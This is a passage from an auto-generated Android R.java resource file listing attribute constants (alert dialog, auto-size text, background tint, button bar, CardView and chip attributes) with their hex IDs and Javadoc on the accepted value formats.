"<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. */ public static final int alertDialogCenterButtons=0x7f0100c0; /** <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". */ public static final int alertDialogStyle=0x7f0100be; /** Theme to use for alert dialogs spawned from this theme. <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". */ public static final int alertDialogTheme=0x7f0100c1; /** Whether to automatically stack the buttons when there is not enough space to lay them out side-by-side. <p>Must be a boolean value, either "<code>true</code>" or "<code>false</code>". <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. */ public static final int allowStacking=0x7f0100d8; /** Alpha multiplier applied to the base color. <p>Must be a floating point value, such as "<code>1.2</code>". <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. */ public static final int alpha=0x7f0101e5; /** The alphabetic modifier key. This is the modifier when using a keyboard with alphabetic keys. The values should be kept in sync with KeyEvent <p>Must be one or more (separated by '|') of the following constant values.</p> <table> <colgroup align="left" /> <colgroup align="left" /> <colgroup align="left" /> <tr><th>Constant</th><th>Value</th><th>Description</th></tr> <tr><td><code>META</code></td><td>0x10000</td><td></td></tr> <tr><td><code>CTRL</code></td><td>0x1000</td><td></td></tr> <tr><td><code>ALT</code></td><td>0x02</td><td></td></tr> <tr><td><code>SHIFT</code></td><td>0x1</td><td></td></tr> <tr><td><code>SYM</code></td><td>0x4</td><td></td></tr> <tr><td><code>FUNCTION</code></td><td>0x8</td><td></td></tr> </table> */ public static final int alphabeticModifiers=0x7f0100e6; /** The length of the arrow head when formed to make an arrow <p>Must be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. */ public static final int arrowHeadLength=0x7f0100df; /** The length of the shaft when formed to make an arrow <p>Must be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. */ public static final int arrowShaftLength=0x7f0100e0; /** Default AutoCompleteTextView style. <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". */ public static final int autoCompleteTextViewStyle=0x7f0100c6; /** The maximum text size constraint to be used when auto-sizing text. <p>Must be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. */ public static final int autoSizeMaxTextSize=0x7f01005c; /** The minimum text size constraint to be used when auto-sizing text. <p>Must be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. */ public static final int autoSizeMinTextSize=0x7f01005b; /** Resource array of dimensions to be used in conjunction with <code>autoSizeTextType</code> set to <code>uniform</code>. Overrides <code>autoSizeStepGranularity</code> if set. <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". */ public static final int autoSizePresetSizes=0x7f01005a; /** Specify the auto-size step size if <code>autoSizeTextType</code> is set to <code>uniform</code>. The default is 1px. Overwrites <code>autoSizePresetSizes</code> if set. <p>Must be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. */ public static final int autoSizeStepGranularity=0x7f010059; /** Specify the type of auto-size. Note that this feature is not supported by EditText, works only for TextView. <p>Must be one of the following constant values.</p> <table> <colgroup align="left" /> <colgroup align="left" /> <colgroup align="left" /> <tr><th>Constant</th><th>Value</th><th>Description</th></tr> <tr><td><code>none</code></td><td>0</td><td> No auto-sizing (default). </td></tr> <tr><td><code>uniform</code></td><td>1</td><td> Uniform horizontal and vertical text size scaling to fit within the container. </td></tr> </table> */ public static final int autoSizeTextType=0x7f010058; /** Specifies a background drawable for the action bar. <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". */ public static final int background=0x7f010035; /** Specifies a background drawable for the bottom component of a split action bar. <p>May be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". <p>May be a color value, in the form of "<code>#<i>rgb</i></code>", "<code>#<i>argb</i></code>", "<code>#<i>rrggbb</i></code>", or "<code>#<i>aarrggbb</i></code>". */ public static final int backgroundSplit=0x7f010037; /** Specifies a background drawable for a second stacked row of the action bar. <p>May be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". <p>May be a color value, in the form of "<code>#<i>rgb</i></code>", "<code>#<i>argb</i></code>", "<code>#<i>rrggbb</i></code>", or "<code>#<i>aarrggbb</i></code>". */ public static final int backgroundStacked=0x7f010036; /** Tint to apply to the background. <p>Must be a color value, in the form of "<code>#<i>rgb</i></code>", "<code>#<i>argb</i></code>", "<code>#<i>rrggbb</i></code>", or "<code>#<i>aarrggbb</i></code>". <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. */ public static final int backgroundTint=0x7f010122; /** Blending mode used to apply the background tint. <p>Must be one of the following constant values.</p> <table> <colgroup align="left" /> <colgroup align="left" /> <colgroup align="left" /> <tr><th>Constant</th><th>Value</th><th>Description</th></tr> <tr><td><code>src_over</code></td><td>3</td><td> The tint is drawn on top of the drawable. [Sa + (1 - Sa)*Da, Rc = Sc + (1 - Sa)*Dc] </td></tr> <tr><td><code>src_in</code></td><td>5</td><td> The tint is masked by the alpha channel of the drawable. The drawable’s color channels are thrown out. [Sa * Da, Sc * Da] </td></tr> <tr><td><code>src_atop</code></td><td>9</td><td> The tint is drawn above the drawable, but with the drawable’s alpha channel masking the result. [Da, Sc * Da + (1 - Sa) * Dc] </td></tr> <tr><td><code>multiply</code></td><td>14</td><td> Multiplies the color and alpha channels of the drawable with those of the tint. [Sa * Da, Sc * Dc] </td></tr> <tr><td><code>screen</code></td><td>15</td><td> [Sa + Da - Sa * Da, Sc + Dc - Sc * Dc] </td></tr> <tr><td><code>add</code></td><td>16</td><td> Combines the tint and icon color and alpha channels, clamping the result to valid color values. Saturate(S + D) </td></tr> </table> */ public static final int backgroundTintMode=0x7f010123; /** The length of the bars when they are parallel to each other <p>Must be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. */ public static final int barLength=0x7f0100e1; /** <p>Must be a boolean value, either "<code>true</code>" or "<code>false</code>". <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. */ public static final int behavior_autoHide=0x7f010192; /** <p>Must be a boolean value, either "<code>true</code>" or "<code>false</code>". <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. */ public static final int behavior_fitToContents=0x7f01015a; /** <p>Must be a boolean value, either "<code>true</code>" or "<code>false</code>". <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. */ public static final int behavior_hideable=0x7f010158; /** <p>Must be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. */ public static final int behavior_overlapTop=0x7f0101a3; /** <p>May be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. <p>May be one of the following constant values.</p> <table> <colgroup align="left" /> <colgroup align="left" /> <colgroup align="left" /> <tr><th>Constant</th><th>Value</th><th>Description</th></tr> <tr><td><code>auto</code></td><td>-1</td><td></td></tr> </table> */ public static final int behavior_peekHeight=0x7f010157; /** <p>Must be a boolean value, either "<code>true</code>" or "<code>false</code>". <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. */ public static final int behavior_skipCollapsed=0x7f010159; /** <p>Must be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. */ public static final int borderWidth=0x7f01018f; /** Style for buttons without an explicit border, often used in groups. <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". */ public static final int borderlessButtonStyle=0x7f010097; /** <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". */ public static final int bottomAppBarStyle=0x7f010124; /** <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". */ public static final int bottomNavigationStyle=0x7f010125; /** <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". */ public static final int bottomSheetDialogTheme=0x7f010126; /** <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". */ public static final int bottomSheetStyle=0x7f010127; /** <p>Must be a color value, in the form of "<code>#<i>rgb</i></code>", "<code>#<i>argb</i></code>", "<code>#<i>rrggbb</i></code>", or "<code>#<i>aarrggbb</i></code>". <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. */ public static final int boxBackgroundColor=0x7f0101d8; /** <p>Must be one of the following constant values.</p> <table> <colgroup align="left" /> <colgroup align="left" /> <colgroup align="left" /> <tr><th>Constant</th><th>Value</th><th>Description</th></tr> <tr><td><code>none</code></td><td>0</td><td></td></tr> <tr><td><code>filled</code></td><td>1</td><td></td></tr> <tr><td><code>outline</code></td><td>2</td><td></td></tr> </table> */ public static final int boxBackgroundMode=0x7f0101d1; /** <p>Must be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. */ public static final int boxCollapsedPaddingTop=0x7f0101d2; /** <p>Must be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. */ public static final int boxCornerRadiusBottomEnd=0x7f0101d6; /** <p>Must be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. */ public static final int boxCornerRadiusBottomStart=0x7f0101d5; /** <p>Must be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. */ public static final int boxCornerRadiusTopEnd=0x7f0101d4; /** <p>Must be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. */ public static final int boxCornerRadiusTopStart=0x7f0101d3; /** <p>Must be a color value, in the form of "<code>#<i>rgb</i></code>", "<code>#<i>argb</i></code>", "<code>#<i>rrggbb</i></code>", or "<code>#<i>aarrggbb</i></code>". <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. */ public static final int boxStrokeColor=0x7f0101d7; /** <p>Must be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. */ public static final int boxStrokeWidth=0x7f0101d9; /** Style for buttons within button bars <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". */ public static final int buttonBarButtonStyle=0x7f010094; /** Style for the "negative" buttons within button bars <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". */ public static final int buttonBarNegativeButtonStyle=0x7f0100c4; /** Style for the "neutral" buttons within button bars <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". */ public static final int buttonBarNeutralButtonStyle=0x7f0100c5; /** Style for the "positive" buttons within button bars <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". */ public static final int buttonBarPositiveButtonStyle=0x7f0100c3; /** Style for button bars <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". */ public static final int buttonBarStyle=0x7f010093; /** <p>Must be one or more (separated by '|') of the following constant values.</p> <table> <colgroup align="left" /> <colgroup align="left" /> <colgroup align="left" /> <tr><th>Constant</th><th>Value</th><th>Description</th></tr> <tr><td><code>top</code></td><td>0x30</td><td> Push object to the top of its container, not changing its size. </td></tr> <tr><td><code>bottom</code></td><td>0x50</td><td> Push object to the bottom of its container, not changing its size. </td></tr> </table> */ public static final int buttonGravity=0x7f010117; /** <p>Must be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. */ public static final int buttonIconDimen=0x7f010050; /** <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". */ public static final int buttonPanelSideLayout=0x7f01004a; /** <p>May be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". <p>May be one of the following constant values.</p> <table> <colgroup align="left" /> <colgroup align="left" /> <colgroup align="left" /> <tr><th>Constant</th><th>Value</th><th>Description</th></tr> <tr><td><code>standard</code></td><td>0</td><td></td></tr> <tr><td><code>wide</code></td><td>1</td><td></td></tr> <tr><td><code>icon_only</code></td><td>2</td><td></td></tr> </table> */ public static final int buttonSize=0x7f010003; /** Normal Button style. <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". */ public static final int buttonStyle=0x7f0100c7; /** Small Button style. <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". */ public static final int buttonStyleSmall=0x7f0100c8; /** Tint to apply to the button drawable. <p>Must be a color value, in the form of "<code>#<i>rgb</i></code>", "<code>#<i>argb</i></code>", "<code>#<i>rrggbb</i></code>", or "<code>#<i>aarrggbb</i></code>". <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. */ public static final int buttonTint=0x7f0100d9; /** Blending mode used to apply the button tint. <p>Must be one of the following constant values.</p> <table> <colgroup align="left" /> <colgroup align="left" /> <colgroup align="left" /> <tr><th>Constant</th><th>Value</th><th>Description</th></tr> <tr><td><code>src_over</code></td><td>3</td><td> The tint is drawn on top of the drawable. [Sa + (1 - Sa)*Da, Rc = Sc + (1 - Sa)*Dc] </td></tr> <tr><td><code>src_in</code></td><td>5</td><td> The tint is masked by the alpha channel of the drawable. The drawable’s color channels are thrown out. [Sa * Da, Sc * Da] </td></tr> <tr><td><code>src_atop</code></td><td>9</td><td> The tint is drawn above the drawable, but with the drawable’s alpha channel masking the result. [Da, Sc * Da + (1 - Sa) * Dc] </td></tr> <tr><td><code>multiply</code></td><td>14</td><td> Multiplies the color and alpha channels of the drawable with those of the tint. [Sa * Da, Sc * Dc] </td></tr> <tr><td><code>screen</code></td><td>15</td><td> [Sa + Da - Sa * Da, Sc + Dc - Sc * Dc] </td></tr> <tr><td><code>add</code></td><td>16</td><td> Combines the tint and icon color and alpha channels, clamping the result to valid color values. Saturate(S + D) </td></tr> </table> */ public static final int buttonTintMode=0x7f0100da; /** Background color for CardView. <p>Must be a color value, in the form of "<code>#<i>rgb</i></code>", "<code>#<i>argb</i></code>", "<code>#<i>rrggbb</i></code>", or "<code>#<i>aarrggbb</i></code>". <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. */ public static final int cardBackgroundColor=0x7f01001e; /** Corner radius for CardView. <p>Must be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. */ public static final int cardCornerRadius=0x7f01001f; /** Elevation for CardView. <p>Must be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. */ public static final int cardElevation=0x7f010020; /** Maximum Elevation for CardView. <p>Must be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. */ public static final int cardMaxElevation=0x7f010021; /** Add padding to CardView on v20 and before to prevent intersections between the Card content and rounded corners. <p>Must be a boolean value, either "<code>true</code>" or "<code>false</code>". <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. */ public static final int cardPreventCornerOverlap=0x7f010023; /** Add padding in API v21+ as well to have the same measurements with previous versions. <p>Must be a boolean value, either "<code>true</code>" or "<code>false</code>". <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. */ public static final int cardUseCompatPadding=0x7f010022; /** <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". */ public static final int cardViewStyle=0x7f01001d; /** Default Checkbox style. <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". */ public static final int checkboxStyle=0x7f0100c9; /** <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". */ public static final int checkedChip=0x7f010179; /** <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". */ public static final int checkedIcon=0x7f01016b; /** <p>Must be a boolean value, either "<code>true</code>" or "<code>false</code>". <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. */ public static final int checkedIconEnabled=0x7f01016a; /** <p>Must be a boolean value, either "<code>true</code>" or "<code>false</code>". <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. */ public static final int checkedIconVisible=0x7f010169; /** Default CheckedTextView style. <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". */ public static final int checkedTextViewStyle=0x7f0100ca; /** <p>Must be a color value, in the form of "<code>#<i>rgb</i></code>", "<code>#<i>argb</i></code>", "<code>#<i>rrggbb</i></code>", or "<code>#<i>aarrggbb</i></code>". <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. */ public static final int chipBackgroundColor=0x7f01015b; /** <p>Must be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. */ public static final int chipCornerRadius=0x7f01015d; /** <p>Must be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. */ public static final int chipEndPadding=0x7f010173; /** <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". */ public static final int chipGroupStyle=0x7f010128; /** <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". */ public static final int chipIcon=0x7f010162; /** <p>Must be a boolean value, either "<code>true</code>" or "<code>false</code>". <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. */ public static final int chipIconEnabled=0x7f010161; /** <p>Must be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. */ public static final int chipIconSize=0x7f010164; /** <p>Must be a color value, in the form of "<code>#<i>rgb</i></code>", "<code>#<i>argb</i></code>", "<code>#<i>rrggbb</i></code>", or "<code>#<i>aarrggbb</i></code>". <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. */ public static final int chipIconTint=0x7f010163; /** <p>Must be a boolean value, either "<code>true</code>" or "<code>false</code>". <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. */ public static final int chipIconVisible=0x7f010160; /** <p>Must be a dimension value, which is a floating point number appended with a 